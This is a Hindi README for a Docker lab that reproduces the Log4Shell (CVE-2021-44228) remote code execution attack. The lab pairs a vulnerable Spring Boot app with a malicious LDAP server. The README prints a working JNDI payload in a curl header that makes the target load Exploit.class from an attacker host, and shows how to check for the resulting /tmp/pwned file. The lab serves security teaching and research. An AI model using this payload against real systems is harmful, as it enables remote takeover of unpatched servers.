
Docker-आधारित RCE शोषण डेमो Log4Shell (CVE-2021-44228) के लिए कमजोर Spring Boot ऐप, दुर्भावनापूर्ण LDAP सर्वर, और JNDI इंजेक्शन के माध्यम से पेलोड वितरण के साथ।
यह परियोजना Apache Log4j 2 लाइब्रेरी में लॉग4शेल भेद्यता के माध्यम से RCE हमले परिदृश्य का अनुकरण करती है।
Exploit.class प्रदान करता है।आवश्यक है कि Docker और Docker Compose स्थापित हों।
docker compose up --build
दोनों कंटेनर तैयार होने तक प्रतीक्षा करें। vulnerable-app पोर्ट 8080 पर चलेगा।
एक नया टर्मिनल खोलें और X-Api-Version हेडर के माध्यम से JNDI पेलोड वाला अनुरोध भेजें:
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/
vulnerable-app कंटेनर के लॉग जांचें। आप देखेंगे कि पेलोड लॉग हो गया है।attacker कंटेनर के लॉग जांचें। आप देखेंगे कि LDAP कनेक्शन HTTP सर्वर की ओर रीडायरेक्ट हो गया है।/tmp/pwned फ़ाइल vulnerable-app कंटेनर के अंदर बनाई गई है:docker exec -it vulnerable-app ls -la /tmp/pwned
यदि फ़ाइल मौजूद है, तो यह साबित करता है कि दुर्भावनापूर्ण कोड Exploit.class सफलतापूर्वक निष्पादित हो गया है!
यह परियोजना केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। अवैध उद्देश्यों के लिए इसका उपयोग बिल्कुल न करें।